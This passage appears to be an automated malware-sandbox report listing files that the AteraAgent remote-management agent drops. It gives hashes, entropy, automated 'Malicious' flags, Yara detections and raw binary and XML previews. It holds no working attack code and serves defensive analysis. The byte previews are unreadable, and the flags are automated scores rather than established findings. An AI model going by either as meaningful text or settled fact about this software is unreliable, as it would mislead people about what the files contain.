                                                                                                                                                                                                                                                                                                                                  SHA-512:B398A6A66F184193CFA635D6B5DBA9ADB391782F2A82F4609ECB161A4340DC41C82F22A98FEB69F594B7DDF9FB677711BE1FBFA4D796146550E92D22DCA14D15
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>.Z.........." ..0.................. ... ....... .......................`............@.....................................O.... ..P...............0(...@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...P.... ......................@..@.reloc.......@......................@..B........................H.......$...h...........................................................6..o.........*f..o...........o.........*...o...........o...........o.........*...o...........o ..........o!...........o"........*...o#..........o$..........o%...........o&...........o'........*....0..L.........o(..........o)..........o*...........o+...........o,...........o-........*.0..Y.........o...........o/..........o0...........o1...........o2...........o3...........o4.... ...*....0..k.........o5....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\x64\SQLite.Interop.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1799216
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.520454988999628
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:GuvfmOhyS2RuhV0yGzcuHpRs8ulCfUk+qKuMhUwqPevJ8QNYfjmqBBLbNFEohFY9:RHmUMohVWpu8ul0UkTgNCfyo3G
                                                                                                                                                                                                                                                                                                                                  MD5:CBA9D50085EE939B987CF758C727DD62
                                                                                                                                                                                                                                                                                                                                  SHA1:DDC0FAF68995883AC754662C59C4295BB0A64E3B
                                                                                                                                                                                                                                                                                                                                  SHA-256:75E47A697A46E31811FAB8C5D9FE1ABA6BA095B6D13DC79A8C848BE308917C37
                                                                                                                                                                                                                                                                                                                                  SHA-512:A5F3D1B96535E0B523ECD71DC36FD3AF157C630874FF11DA29066C545114D256B14A5EE2BA725679C4192182D37DF6900AA69ECE228BAFCE909A482DFF43A1E0
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............g...g...g.>.....g.>...B.g.>.....g.3.....g......g...f.^.g../....g......g......g......g.Rich..g.................PE..d.....c.........." .................n...............................................s....`.........................................`t.......e..x....`.......@..`....L..0(...p.........8...........................@...p...............`............................text...$........................... ..`.rdata..............................@..@.data...0........z..................@....pdata..`....@......................@..@.rsrc........`......................@..@.reloc...,...p......................@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\x86\SQLite.Interop.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1475632
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.791868709546672
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:TS3uuk58wXpQous2GCzbHwGTzsIDQAKub0MBsIFBm5fi/5ATA9NTTPjXWJD8qC:6dwXpQdNVNDQubXyi60jXTW98qC
                                                                                                                                                                                                                                                                                                                                  MD5:3B462EFAACFAEBA904109B4FD3FE641F
                                                                                                                                                                                                                                                                                                                                  SHA1:6DB8785E94FDC2152895396CB9B3D3945DA5D25A
                                                                                                                                                                                                                                                                                                                                  SHA-256:1F9F620D4D7D32670073C335A2DC88A5A5DCFA7A5FF18E914EC6CD8EA983105F
                                                                                                                                                                                                                                                                                                                                  SHA-512:7295B1F7E4437729DFDAED5310EB26B5F4A8B96A2B97ADA8F8466712A69946BAADB2588071B51D661F4FD2A6029A2914E3DB73914BD2FE1C74D725F204063EF2
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?.rG^.!G^.!G^.!.._!d^.!..]!.^.!..^!.^.!.))!O^.!Y..!D^.!G^.!.^.!d.B!F^.!!.Z!F^.!!.Y!F^.!!.\!F^.!RichG^.!................PE..L...r.c...........!.........*.......:.......@............................................@.........................0B..:....5..x....................\..0(.........pB..8............................1..@............@..0............................text...p-.......................... ..`.rdata..j....@.......2..............@..@.data...tt...`...T...N..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates.zip

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2949915
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.998697868047441
                                                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:Mx8DF8Dc0YpN5yNXQ5R4oUwmA+QwgINfNZJ8fGI9dKRcv5G7QMgOCod:a8ZZNIdohmfaIvMfGI98mv5G7QMQod
                                                                                                                                                                                                                                                                                                                                  MD5:05974AD24D0FC5005FD90CA96941BEAA
                                                                                                                                                                                                                                                                                                                                  SHA1:7CCF99236729A614CA0D15B7E5A18ECE0DD14242
                                                                                                                                                                                                                                                                                                                                  SHA-256:30215A902C746227DF0D5FED400EAF74A5C1E827D50EEC7C21CD37EA1B299AA5
                                                                                                                                                                                                                                                                                                                                  SHA-512:C9426D56833D61A1763F93CE5388A4C2B5AF3C0AE9A71B200A0A3BAB1937381220D9A981077C2BD286A53FAEBDE764FFE1608729E4D3895A69B2318403B89CA9
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:PK..-.....ebJY..b.........6...AgentPackageOsUpdates/AgentPackageOsUpdates.Common.dll....(r.......>.......!S...5.3.I.7..Mk...@...|V,v.\\=...w......O....k...W.8..bb...D..,......{.S.6.')..%.%..........M....=.)X.D..M0.|`{S....$...[dm........e.95........u...w7..}.......3.2[.T..V..!_|.......H...A....5}..h.D.R..{..U....u.K..p..pb...Z....._.$o...A=}rE.4sr]..F.'.....c...Q.-..NY.z;...$cc[Yg<_.....q.#...V...h...Cc.J.A.]ct...!.....3..L).s.....kN.?#.&.gYx.i.....@...4..,..L.....EyY?n!.. Q..6.6..2..~...h.3x..%...'. ...D...U..._gp.Zvi.[..}EgU...\c..@?z_].....x..E6....uJ.A$.'|.x.4.%."....L.......fsoz..N.X<.99..>.awU'.....v.D.Bp....jW..ue..M..R.b.swuS.QH..c.L#...A... ...I.....I'.ff..f...2..v.$..)...5.H.p.I4.Cn.z...Y...._...U..Ms.2.TJt.O.l...c.x..B..=...A>..b#u.....r-)...E..K<.....>.TwE._..Pc..`..p...f.%.-.(.ch... 7....'._.e.L..Xn.1.=$......W..^...T../.D.6...A..c..S.W.:..z...|K.y.uQ..g....ji"...p.}.q.u..u....*.3..L...B..Q.6yH........$.?.^.a..3...h......B..P.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.Common.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):29224
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.344633184100352
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:wpYIrVWGYPHEUePsnhkgGIW7W8feKWDpQ6bo2dNyb8E9VF6IYijSJIVx+Kq:+TrVL3Ue0FSTuVbo2ZEpYi60K
                                                                                                                                                                                                                                                                                                                                  MD5:069A96BB028F6E6703BC960A326ABD59
                                                                                                                                                                                                                                                                                                                                  SHA1:F6264400B1B90539C7616DCCD3A34474AB2DF5E6
                                                                                                                                                                                                                                                                                                                                  SHA-256:6180A8A71ADAE158A4625CC682BB13A6DE635DD3C93C9CDF975114C0112C0D65
                                                                                                                                                                                                                                                                                                                                  SHA-512:4E0B7A8EBD0A7D591D609C787D4EBE44BEA3228D40ACF3E8A346F0A834A993B5AC829D41A19555192CCD4D186222D9A2B2B6D36A2F0A7F42A553511D4901D0D9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.Common.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...I............." ..0..@...........^... ...`....... .............................. O....`.................................=^..O....`...............J..((...........]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc........`.......B..............@..@.reloc...............H..............@..B................q^......H........*...2..........................................................:.(......}....*..0..X.........(.......o......-.....>....o......2.,..o......,..o.......{....r...p...(....o..........*.(.......$..........&...........88.......0..M.........(......-.(...+..8.o....../.,..o.......{....r{..p.......(....o....(...+....*.......................&&.%.....0..].......~......o......-.~.....o..........o.....o........{....r...p......%...%...%...%...( ...o......*....................0..O...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.Common.dll.config

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2006
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.012466327549389
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:327h+1/gF27RgdSagFsg+w3jdgDSg+CagFPr7:K4Mw9cr7
                                                                                                                                                                                                                                                                                                                                  MD5:DE33D7BC716E96683CCAEC7E3DECC54B
                                                                                                                                                                                                                                                                                                                                  SHA1:6CAC5E2AE17A91F55760F3652DD1D954CFE34848
                                                                                                                                                                                                                                                                                                                                  SHA-256:E9EC2DB29E1A7F44D6FAD976E29627E2EBCC1C9FD1797D56A69106260B70B65D
                                                                                                                                                                                                                                                                                                                                  SHA-512:353BF5BC4E47C7218CD3EECEE83301950FAA7D48644BEA3FE2F47B5AB432D43B466EBCF8E1A1911923EC423D30682A8FA42A3EA878E7D85C8E91EC841543B887
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.22.0.997" newVersion="2.22.0.997" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):200232
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.748268560554506
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:Vq1M5sV+q7TAy54+DgSZmtT2tl2g/rPdniqiTj2rRmn9q:0OsVzT7FZl2eLFiqiTjYRV
                                                                                                                                                                                                                                                                                                                                  MD5:84CB0CF784734C3EE8C151BC54F77B6E
                                                                                                                                                                                                                                                                                                                                  SHA1:6F300359BE48F38CA18EA54D744566635FD13E6F
                                                                                                                                                                                                                                                                                                                                  SHA-256:ADACAB8AC34991A5B4908AAFB21A9D0EEF3A24B4A44AC6B48A1AC745623EB2A9
                                                                                                                                                                                                                                                                                                                                  SHA-512:0C628EBAB1720A02B2D2DEE52C805F17B986F3C46A8C91BAC6C67D7A7FAF155DCB1C0A46E208D5B1B7D913F26E81B037E2B9E83D25E65C86CBCA249B26866E34
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@............"...0.................. ........@.. .......................@...........`.................................G...O.......4...............((... ..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...4...........................@..@.reloc....... ......................@..B................{.......H............$............................................................{....*..{....*V.(......}......}....*...0..A........u........4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. K.. )UU.Z(.....{....o ...X )UU.Z(.....{....o!...X*...0..b........r...p......%..{.......%q.........-.&.+.......o"....%..{.......%q.........-.&.+.......o"....(#...*..{$...*..{%...*..{&...*..{'...*..{(...*..{)...*..(......}$.....}%.....}&......}'......}(......})...*..0...........u.......;..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exe.config

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1780
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.027025756159462
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:3rrL7h+1/gFSagFsg+w327RgdSg+CjdgDt:7r34owoR
                                                                                                                                                                                                                                                                                                                                  MD5:09CDFC3063DEC485A3C48111D5CEE297
                                                                                                                                                                                                                                                                                                                                  SHA1:02CEFEC66B6B2EEE120F97493D438F3B270AB5CA
                                                                                                                                                                                                                                                                                                                                  SHA-256:0ACF70AE533AF7D079F370AB3102B9563CA4C447C5DFC7A20C88AABE04295C01
                                                                                                                                                                                                                                                                                                                                  SHA-512:CA39056F79EFC8CE050FCCE1AAC21B2E7B62E65A0521E3CABF90C58A7249107658C2D208706FEC456CCC74D58DCDC22E23ECBAA43684613D4826505A426E1CB7
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>..<startup><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.2" /></startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.22.0.997" newVersion="2.22.0.997" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.0.3.0" newVersion="4.0.3.0" />.. </dependentAssembly>.. <depend

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.ini

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):12
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.418295834054489
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:WhXVLV:WBVh
                                                                                                                                                                                                                                                                                                                                  MD5:92603262EFD6DBD3744A145FF7641A2A
                                                                                                                                                                                                                                                                                                                                  SHA1:E969FDE49A382A2767FC298BA378ADD00CC3D7F7
                                                                                                                                                                                                                                                                                                                                  SHA-256:589B12D3FF5444039F0AC0207F3E9B6B56F8B56E963B092011853EE32F77A60A
                                                                                                                                                                                                                                                                                                                                  SHA-512:68B1D5599038FB809345BC030AE76FD9A3DF60D44F8A051E80C9E199120FF55A4FBFBBD25AC07EFA1826BE889B73AEE5AD486BF68A628D2D75DE38EC94699A95
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:version=20.0

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):102440
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.190162435859503
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:NPAt6+FT+ZGodV5iYbYSWd85e+ZS5sSak42QhLks2OLv476q:N2bYbYSWd85I5sSakFQhHLv4B
                                                                                                                                                                                                                                                                                                                                  MD5:6BACDABC6A468943ADA37E5CB69C8FEB
                                                                                                                                                                                                                                                                                                                                  SHA1:22CF4ABBD05B7D25A79ED264F568383E324BD11C
                                                                                                                                                                                                                                                                                                                                  SHA-256:B8C2DA8C7856C8DC2E092CCA8FC401F28386AB9819E8403A433B6F2CA54ECE96
                                                                                                                                                                                                                                                                                                                                  SHA-512:0DB5593EE41B804536F5961E7EFE76B239307736D84CA78D67E7BFB2BDB3C59CCC6E2B6EB49F6E4DBFD58CCCC3DF845F04689714DC436E12768C4AE164D12BDA
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5*f.........." ..0..^...........}... ........... ..............................[.....`.................................`}..O.......8............h..((..........(|............................................... ............... ..H............text....]... ...^.................. ..`.rsrc...8............`..............@..@.reloc...............f..............@..B.................}......H........s..|............................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p(....r...p(..........(....(......&..*........00......:.(......}....*..0..Z............( ...,......(!...*~..........("........( ...-..(....s#...........,..($.........(!...*..........&E.......0..G........{....,.(......5~%...r'..po&...rm..pr...po'...tR...r...p((..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.CommonLib.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):95272
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.996606007806772
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:a4aRSNSrXS5EaKoDMsUVl0HAWMco2bJkjUB766TX:a4auS7S5Ea6WMcpuUBF
                                                                                                                                                                                                                                                                                                                                  MD5:FCE842D9DBBFB5CA0C04270845A64FEB
                                                                                                                                                                                                                                                                                                                                  SHA1:F1045EB750C5FB13E5FF8885B4ADFF05495D1660
                                                                                                                                                                                                                                                                                                                                  SHA-256:25A064F38F3AF9807D35ACAD6E70A5D24E00EC73FA08DC6AFACCFEE653149633
                                                                                                                                                                                                                                                                                                                                  SHA-512:E06E1AF9DBB730352F414A3E91ADFFDCF6C1F8F497F8606538A693E617793A37CD893D83DF738FC7E4163C7754C462696F61C7EC94144DC7204AA8DA7582119A
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=$..........." ..0..B..........b`... ........... ..............................rj....`..................................`..O.......4............L..((..........h_..8............................................ ............... ..H............text...h@... ...B.................. ..`.rsrc...4............D..............@..@.reloc...............J..............@..B................A`......H.......Lh................................................................(......}......}.......}.......}........o<...}....*..{....*>.{....o.......*v.{....o...........s....(...+*...0..<........{....o.....{....#.......@(....o.....{......o........&.....*........55........{....o.....{....#.......@(....o.....{......o....*..0..$........(......`...%..".o......{.....o....*Z.(....r...po ...o....*..{....o/...r...p.(....(....o%...*6..(....o....*..{....*..{....*.s....z.s....z.s....z.s..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.Exceptions.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16424
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.652402330503958
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:1UXh+/DtY2PLNyby2sE9jBF6IYiYF85S35IVnxGUHFeFlWhK1E9aPu:1UXh+tY2jNyb8E9VF6IYijSJIVxaFCQW
                                                                                                                                                                                                                                                                                                                                  MD5:620338616B011EF94B5C26DE68CABAE7
                                                                                                                                                                                                                                                                                                                                  SHA1:81E598D75DC7A0C94087533BA36676E0DF35AD68
                                                                                                                                                                                                                                                                                                                                  SHA-256:10AF0C95D1ADA19F878CB6A80A70214834C2F36155D67FF5345B4D05CB6BA477
                                                                                                                                                                                                                                                                                                                                  SHA-512:7CA259E7C737C826802DB0AC88CB6D74069C31BE685919D3618E873A5E408D8BCEDDE2392A1E2C2BD88D26FC38804417E16B3323F38E2ED4760A05954C236AA5
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...T............." ..0.............v,... ...@....... ....................................@.................................",..O....@..(...............((...`......H+..8............................................ ............... ..H............text...|.... ...................... ..`.rsrc...(....@......................@..@.reloc.......`......................@..B................V,......H........ ..d...........................................................&...(....*6.r...p.(....*..(....*..(....*"..(....*. ....*.r-..p*..(....*"..(....*. ....*.r...p*..(....*"..(....*. .*..*.r...p*. ....*.rN..p*..(....*.BSJB............v2.0.50727......l.......#~......<...#Strings....D...$...#US.h.......#GUID...x.......#Blob...........G..........3......................................................................f.....F...........n.................M...........2...........Z.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.ModelsV3.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):75304
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.239824186437336
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:hu2lKxktXgl4icipJNz671/nVYWREDnAvk2jkbukZmyJsldySMcAn9fG1EcfgrYa:wF+qo7mDEwj4NXLGcfgruFcaD76jwG
                                                                                                                                                                                                                                                                                                                                  MD5:C2CB0AD1FA683CB57F40C9382449D41C
                                                                                                                                                                                                                                                                                                                                  SHA1:0B0974C7E74E4E587A4A0D7ACCCD6FC1B96D00DE
                                                                                                                                                                                                                                                                                                                                  SHA-256:36C5BCD5DD2A8E93106700518FBC555840E2D0020CEA1D32A5E64A1270E50A42
                                                                                                                                                                                                                                                                                                                                  SHA-512:0C05DE1A00A1A575284093E90E9794354E25604F582EA8846F2F6FE3D2A0551630E932B01A1CAC018FACA0467FE2710DE977DD9D981EBBE81B1C37B91328D609
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6............" ..0.............F.... ... ....... .......................`......+.....`.....................................O.... ..................((...@..........T............................................ ............... ..H............text...L.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................%.......H.......t<..`.............................................................{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*...0...........(.....(.....o....(....*.0...........(.....(.....o....(...+*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..(..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.Utils.dll

                                                                                                                                                                                                                                                                                                                                  Download File
